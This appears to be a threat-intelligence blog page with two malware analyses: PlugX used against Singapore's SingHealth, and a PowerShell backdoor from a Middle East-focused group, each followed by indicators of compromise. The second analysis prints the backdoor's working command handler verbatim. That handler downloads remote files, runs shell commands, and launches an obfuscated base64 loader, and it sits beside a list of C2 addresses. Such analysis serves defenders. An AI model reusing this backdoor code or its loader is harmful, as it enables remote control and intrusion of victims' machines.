afdf1960a5c372b815475807ff1ad1d16874d2802ce4ee71da484d61220f7a65
4b825d310a305728b7a57d9eb6731db87e8da9cef4bc7917fca7f4503bcb3272
dd9bb177732197539bdb9167fb3dd784df10d6746a9b77255d62dfaccb092640
036567c36aaaabefcd222456b536bffee1ce4ccf279593048d62c9ef42b57472
4b825d310a305728b7a57d9eb6731db87e8da9cef4bc7917fca7f4503bcb3272
5c9773c3b4cf58839a476d469c6a705d66df95a2a8cc6ad72a3d914beff2eff5

IP Addresses

103[.]249[.]31[.]159
88[.]99[.]13[.]69
154[.]16[.]201[.]104

References

PowerShell-Suite/UAC-TokenMagic.ps1
Reading Your Way Around UAC (Part 1)
User Account Control

SectorM04 Targeting Singapore – An Analysis

Overview

On or around June 27, 2018, personal particulars of almost 1.5 million people was exfiltrated from a SingHealth database in Singapore where information on patients was stored. Multiple pieces and types of malware was used in this attack which took place over almost a year [1].

Illustration using details from p.53 of the COI report

On 6th March, Symantec released a blog article [2] linking several pieces of malware and a threat group which we will be tracking as SectorM04 to Singapore’s SingHealth breach last year. One such artifact we found an exact match on was the DLL Shellcode Loader which was referred to as Trojan.Vcrodat that is one of the files dropped as something which has characteristics of the PlugX RAT. The PlugX RAT is a RAT which has been used by multiple threat groups, including one which was reported to have interests in the healthcare sector [3].

Decoy (e9b12791e0ab3a952fa09afd29e5a1416abd917edf5c913af7573adf8ccc39b0)

The dropper for that file was in the form of a decoy executable/document and named as “PositionRequirement-SeniorCivilEngineer.doc.exe”. Opening this results in the Word document below being opened, and everything will seem normal to the victim.

Decoy document that is opened after executing the malware

However, this is actually a trick because the malware uses a “.docx.exe” extension. The actual executable drops other files in the same folder – a legitimate signed executable, a malicious DLL file which abuses the DLL search order [4] from the executable, a compressed shellcode file, a simple batch script (a.bat) to clear its tracks, and a normal Word document. The executable then executes the normal Word document, the batch script, and drops the remaining three files and executes the legitimate signed executable.

a.bat – a simple batch script to hide the tracks of the original EXE
:Repeat del <filepath>\filename.docx.exe if exist <filepath>\filename.docx.exe goto Repeat

If this was the RAT used for the initial infection, then it seems to reinforce the theory that one likely initial infection vector was via spear phishing using a link or an archived file [1]. This is because using an exploit to automatically run this dropper would not make sense as the malware also automatically opens a benign Word document which would arouse suspicion if it opened by itself.

PlugX Trinity

Those remaining three files are actually the three files in what other researchers have dubbed the PlugX Trinity [5] – a legitimate signed executable, a loader DLL, and a shellcode file.

In this example, while the legitimate signed executable was a file named adobe.exe it was actually an application from ESET. However, the attacker uses DLL side loading, and this “adobe.exe” file tries to load MSVCR110.dll which is a legitimate system DLL. But because of the way the DLL search order works, the system tries to find MSVCR110.dll from the directory from which the application loaded first, thus loading the attacker’s version of MSVCR110.dll.

MSVCR110.dll is a tiny dll made up of exported functions which the real MSVCR110.dll should have. These external functions simply jump to the MSVCR90.dll when called, except for the “__crtGetShowWindowMode” function which calls the malicious function. The malicious function will proceed to read the MSVCR110.dat shellcode file into memory and decompress the buffer using RtlDecompressBuffer under the COMPRESSION_FORMAT_LZNT1 scheme, a method seen since early days of the PlugX RAT [6], and further unpack the shellcode. Throughout the unpacking process, it makes use of its Process Environment Block (PEB) to parse the PEB_LDR_DATA structure for getting addresses of functions and libraries it wants to use.

When starting, this malware uses the Global mutex named “eeclnt”. It will run another copy of itself with the arguments “258”, and this copy will run %windir%\system32\msiexec.exe as it disables WOW64 redirection.

The created msiexec.exe will be started with the flags 0x434 which among other things starts the process in a suspended mode and command line arguments “259”, then performs process injection so that the malware is running as msiexec.exe.

Persistence

In order to persist on a system, the malware makes use of %APPDATA%\Windows folder, setting the folder attributes to HIDDEN | SYSTEM and moving MSVCR110.dll, MSVCR110.dat, and eeclnt.exe (renamed from adobe.exe) there. It stores this new location of the shellcode file (MSVCR110.dat) in an environment variable “%UI00%” and the location of the DLL file (MSVCR110.dll) in an environment variable “%UI01%”.

There are two persistence mechanisms it makes use of:

  1. Service with service name and display name set to “WanServer”, which starts %APPDATA%\Windows\eeclnt.exe with the command line arguments “260”. The service description used is “Network for this computer. If this service is stopped, these functions will be unavailable.”, which is a generic sounding but unique description for this malicious service.
  2. If the service failed to be created, most likely due to insufficient privileges, then the malware would make use of the standard run registry key located at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with key “eeclnt” and value %APPDATA%\Windows\eeclnt.exe with the command line arguments “260”.
Command LineDescription
NULLRe-run with arguments “258” and continue
“258” / “260”Run %windir%\system32\msiexec.exe with arguments “259” or “261” respectively in suspended mode and inject itself into it
“259”Create persistence via service / run registry key and run itself as “eeclnt.exe” with arguments “260”
“261”Run normally, including C2 communications.

C2 Beacon

The malware beacons using a legitimate HTTPS POST on port 443 to “/login.asp?id=%d” where %d is the victim identifier using the user-agent “User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)” via WinINet.dll’s HttpSendRequestA. If the configuration uses a different port, then the request is done via HTTP.

Hooking

The malware manually sets inline hooks on SspiCli.dll’s AcquireCredentialsHandleA function if running on Windows 10. AcquireCredentialsHandleA is actually a function normally called from secur32.dll, which then forwards the API call to SspiCli.dll. Before performing the actual function, the inline hook will use the process token from explorer.exe and perform ImpersonateLoggedOnUser() with that token, which is a trick we are seeing for the first time and seems to be for UAC bypass.

The malware also manually sets inline hooks on WSs2_32.dll’s closesocket and shutdown functions. Before performing the closesocket function, the inline hook will perform “setsockopt(socket, SOL_SOCKET, SO_DONTLINGER, 0, 4)” and on shutdown, the inline hook will simply return from the function instead.

Information Collected

The malware mainly collects the following information from the system automatically:

  • Major, minor, and build OS versions
  • NetBIOS Name
  • MAC Address
  • Logged on user name

Other PlugX Capabilities

Similar to previous PlugX variants [7], this version zeroes out its entire PE header (without that false “XV” header), together with other certain other PE sections we presume the attacker did not want others to see.

Finally, besides this technical analysis, it is important to remember that PlugX in general has reverse shell capabilities and typically has additional modules which might be either decrypted or downloaded as shellcode [8].

Summary

While we cannot be sure of the SectorM04’s motives, healthcare data is information that has a lot of potential for intelligence gathering with the most obvious being used for blackmail. They have shown their willingness, ability, and patience to compromise their targets, of which Singapore appears to be one of the bigger ones. As is the case for many nation state threat actor groups, it is important to remember that cyber is only one part of an intelligence operation.

ATT&CK Matrix

RECON
WEAPONIZATION
DELIVERY
EXPLOIT
INSTALL
COMMAND
OBJECTIVE

Indicators of Compromise

PlugX Trinity Hashes (SHA-256)

PlugX RAT Full Dropper
e9b12791e0ab3a952fa09afd29e5a1416abd917edf5c913af7573adf8ccc39b0

PlugX Trinity – Legitimate signed executables
fafb6ffd3ffcf414b702354f62a5216351af4566ed61ece7784846a6938bb8d9
36d76999e9090c99fae2388cd3476134464807fc597f67c60eebc76e32339683

PlugX Trinity – Malicious DLLs which are used to abuse search order
CACEA09B3A5839B0A158F49B4EFEC2A698DB8688F57A92CBA61F287A1619833E
ED3CD71EACA603A00E4C0804DC34D84DC38C6C1E1C1F43AF0568FB162C44C995
3B86CF2DEB6524D556AB0109B39A31AEDE3D0ACE423C94FD72DEFD6AB592A3AB
D784A12FEC628860433C28CAA353BB52923F39D072437393629039FA4B2EC8AD
6e874ac92c7061300b402dc616a1095fa7d13c8a18c8a3ea5b30ffa832a7372c

PlugX Trinity – Shellcode files
2201C3AC955148A078D366DC1E9F552FCA4A872756D3B6DA93494CDE8D5DECD5
5664334F2DE563B9F8978B7E33AED4526F96D6D9751F1204D7FBBF659C4F0F7B

Other Hashes (SHA-256)

Another RAT Used
b2b2e900aa2e96ff44610032063012aa0435a47a5b416c384bd6e4e58a048ac9
c83651940e90fd315f29fa878e96b9e1f624c840c09c187b376cffdd4c7dcd79
6a633b83987dc01ec30d07b56e8a8b632dcb8ad40602e7036648cd70cdfb9fde
9c2a0f30d49b70a9e81461c91e26ede52b9b65da4d44b7f81299914497203f29
552cc8f42953ece5f69cd8c75dd9af3c059d10327ac6b75e4922f01572d4b7b7

Others
9d9a6337c486738edf4e5d1790c023ba172ce9b039df1b7b9720ed4c4c9ade90
93c9310f3984d96f53f226f5177918c4ca78b2070d5843f08d2cf351e8c239d5
dda22de8ad7d807cdac8c269b7e3b35a3021dcbff722b3d333f2a12d45d9908d
f562e9270098851dc716e3f17dbacc7f9e2f98f03ec5f1242b341baf1f7d544c
a196dfe4ef7d422aadf1709b12511ae82cb96aad030422b00a9c91fb60a12f17

Domains

api[.]edu-us[.]tk
api[.]officeonlinetool[.]com
news[.]singmicrosoft[.]ga
api[.]micsoftoffice[.]ga

IP Addresses

195[.]20[.]45[.]94
64[.]20[.]227[.]134
50[.]63[.]202[.]51
192[.]71[.]247[.]131
158[.]255[.]4[.]177

References

[1] https://www.mci.gov.sg/coireport
[2] https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore
[3] https://www.kaspersky.com/about/press-releases/2018_chinese-speaking-apt-actor-caught-spying-on-pharmaceutical-organizations
[4] https://docs.microsoft.com/en-us/windows/desktop/dlls/dynamic-link-library-search-order#standard-search-order-for-desktop-applications
[5] https://citizenlab.ca/2012/09/human-rights-groups-targeted-by-plugx-rat/
[6] https://sophosnews.files.wordpress.com/2013/07/sophosszappanosplugxrevisitedintroducingsmoaler-rev1.pdf
[7] https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/
[8] https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii.html

SectorD02 PowerShell Backdoor Analysis

Overview

SectorD02 is a state sponsored threat actor group which mainly targets governments and organizations around the Middle East. In this case, the target of this malware was Turkey, although it has been reported that they also sometimes target countries outside of the Middle East. One characteristic of SectorD02 is their incrementally changing PowerShell backdoor.

We came across two of SectorD02’s such backdoors at the end of 2018, and we analyzed these variants then identified them as the group’s PowerShell malware. SectorD02 focuses on using PowerShell scripts to carry out their attacks and loading those scripts past layers of obfuscation through a variety of methods. One such method is via PS2EXE (PowerShell to EXE), and our analysis on public reporting has shown they have used this vector sometimes [1] since their attacks had first been grouped and given a name [2].

PowerShell Backdoor

Both versions of the PS2EXE backdoors we came across end up executing the exact same PowerShell script (which includes the same victim ID), and the main difference seems to be that they were compiled seconds apart and yet having different compiler linker versions.

Hash (SHA-256)Compile TimestampLinker Version
4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd039414.10.2018 09:20:038.0 (.NET 2)
d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c14.10.2018 09:20:2010.0 (.NET 4)

This is a strange scenario and seems to indicate that the attacker had likely either introduced build automation into its malware creation process or had more than one employee/machine/environment for creating builds for distribution and did so almost at the same time. However, since SectorD02 is constantly changing their methods of producing malware and the scripts themselves, it does not make any economical sense to automate this in a build and we have not seen evidence of it elsewhere, so the latter is what we believe to be the most likely scenario.

After extracting the encoded PowerShell script from the PS2EXE executable, the first thing we see is some Hebrew text stored in two variables. These same unused variables have been left there in other variants of their backdoor reported by others, but is completely meaningless as the attackers have even left Chinese text in earlier samples [3].

Some of the things we see in this version are:

  • Hiding and setting of system attribute for svchost.html, svchost.zip, and svchosts.exe in the C:\Windows directory. Similar sounding filenames/extensions have been reported being used by this group elsewhere [4], and indicate that there are other pieces of malware used in the same attack we are not yet aware of.
  • First persistence: Standard HKLM run registry key for “WindowsDefender” with the value “c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\Windows\svchost.html,svchost,1,”.
  • Second persistence: Scheduled task with the same value as before under “Microsoft\WindowsMapsUpdateInfo”.

Creating the Victim ID

As usual, they follow their mechanism for getting the victim ID using a combination of information taken from the victim machine. This similar kind of mechanism can be seen since early last year [5]. Recently, other researchers found a different version which used “::” as a separator instead of “**” [6], but it is hard to say whether these malware are made by the same group.

$SysInfo = getOS $SysInfo += “**” $SysInfo += getIP $SysInfo += “**” $SysInfo += getArch $SysInfo += “**” $SysInfo += getHostName $SysInfo += “**” $SysInfo += getDomain $SysInfo += “**” $SysInfo += isAdmin $SysInfo += getUsername $SysInfo += “**” $SysInfo += getPIP $global:id = md5generator($SysInfo) return ($global:id + ‘**’ + $SysInfo)

C2 Commands

When the group is not changing their malware functionality, they are constantly at least changing their naming of items in their scripts. In this variant, we can see the commands “upload”, “cmd”, “b64”, and “muddy”.

function command_and_control($cmd){ try{ if($cmd.StartsWith(‘upload’)){ try{ $cmd=$cmd.replace(‘upload ‘,”) $wc = New-Object System.Net.WebClient $wc.proxy = [Net.WebRequest]::GetSystemWebProxy() $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials $wc.DownloadFile($cmd, (“c:\programdata\” + $cmd.Substring($cmd.LastIndexOf(‘/’),$cmd.Length-$cmd.LastIndexOf(‘/’)))) return Eval “pwd” }catch{ return $_.Exception.Message } } elseif($cmd.StartsWith(‘cmd’)){ $cmd=$cmd.replace(‘cmd ‘,”) try{ $out = cmd /c $cmd $out = $out | Out-String return $out } catch { return $_.Exception.Message } } elseif($cmd.StartsWith(‘b64’)){ $cmd=$cmd.replace(‘b64 ‘,”) try{ $cmd = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($cmd)) $out = Eval $cmd $out = $out | Out-String return $out } catch { return $_.Exception.Message } } elseif($cmd.StartsWith(‘muddy’)){ $cmd=$cmd.replace(‘muddy ‘,”) $cmd = shttpGET($cmd) set-content -path “c:\programdata\LSASS” -value $cmd try{ Start-Process powershell -ArgumentList ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(“LWV4ZWMgQnlwYXNzIC1jICRzPShnZXQtY29udGVudCBjOlxwcm9ncmFtZGF0YVxMU0FTUyk7JGQgPSBAKCk7JHYgPSAwOyRjID0gMDt3aGlsZSgkYyAtbmUgJHMubGVuZ3RoKXskdj0oJHYqNTIpKyhbSW50MzJdW2NoYXJdJHNbJGNdLTQwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtpZXgoW1N0cmluZ106OkpvaW4oJycsJGQpKTs=”))) -WindowStyle Hidden return (Eval “ls c:\programdata”) } catch { return $_.Exception.Message } } else { return Eval $cmd } } catch{ return $_.Exception.Message } }

Random Proxy

This variant has four C2 IP addresses and uses one of them randomly. These IP addresses were used in other attacks around the same time as well [1]. As usual, these C2 servers are likely to be simply hacked servers like as before [7], something acknowledged by the attacker when they refer to their servers as proxies as well.

$C = @(‘hxxp://78[.]129[.]139[.]148′,’hxxp://79[.]106[.]224[.]203′,’hxxp://104[.]237[.]233[.]17′,’hxxp://185[.]34[.]16[.]82’) function getRandomProxy(){ $rnd = Get-Random -minimum 0 -maximum ($C.Length) $global:url = $C[$rnd] }

Interestingly, even at the time of writing, two of the proxy C2 servers (79[.]106[.]224[.]203 and 185[.]34[.]16[.]82) had the “MikroTik bandwidth-test server” on port 2000 enabled and that could have been how the servers got compromised and used as C2 servers.

Summary

SectorD02 is one of those groups which are much harder and complicated to attribute attacks to because attribution based solely/heavily on technical indicators from malware simply does not work. We have talked about this before in our previous post [8] and although this backdoor can be considered a custom malware, it may as well be open source because it is so easy for others to modify these malware and reuse it for their own attacks.

Indicators of Compromise

Hashes (SHA-256)

4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd0394
d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c

IPs

78[.]129[.]139[.]148
79[.]106[.]224[.]203
104[.]237[.]233[.]17
185[.]34[.]16[.]82

References

[1] https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group
[2] https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east
[3] https://securelist.com/muddywater/88059
[4] https://www.emanueledelucia.net/site/files/2018/10/muddywater.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html
[6] https://blog.trendmicro.com/trendlabs-security-intelligence/new-powershell-based-backdoor-found-in-turkey-strikingly-similar-to-muddywater-tools/
[7] https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/
[8] https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/